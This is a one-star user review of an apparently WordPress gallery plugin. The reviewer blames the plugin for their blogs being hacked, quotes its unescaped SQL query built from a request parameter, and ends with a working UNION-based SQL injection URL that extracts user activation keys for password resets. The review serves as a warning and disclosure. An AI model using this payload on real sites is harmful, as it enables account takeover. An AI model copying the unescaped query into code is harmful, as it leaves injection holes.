Rating: 1 star

This plugin was responsable for my blogs getting hacked as they use highly vulnerable code in this plugin.

There is no protection against SQL injection in the plugin functions. Request parameters are added happily to some SQL query without escaping them; in the following example $galleryID is a simply copy of $_REQUEST["galleryID"]:

$pictures = $wpdb->get_results("SELECT t.*, tt.* FROM $wpdb->nggallery AS t INNER JOIN $wpdb->nggpictures AS tt ON t.gid = tt.galleryid WHERE t.gid = '$galleryID' AND tt.exclude != 1 ORDER BY tt.$ngg_options[galSort] $ngg_options[galSortDir] ");

I recommend to not use this plugin at all. It was obviously developed by some programming beginner and should not be used on production site.

Example: Set your own activation key for a user to reset the password to your own:

nggSmoothFrame.php?galleryID=999999.9'+union+all+select+0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,
(select+concat(0x7e,0x27,wp_users.user_activation_key,0x27,0x7e)+from+wp_users+Order+by+user_login+limit+5,1)+,0x31'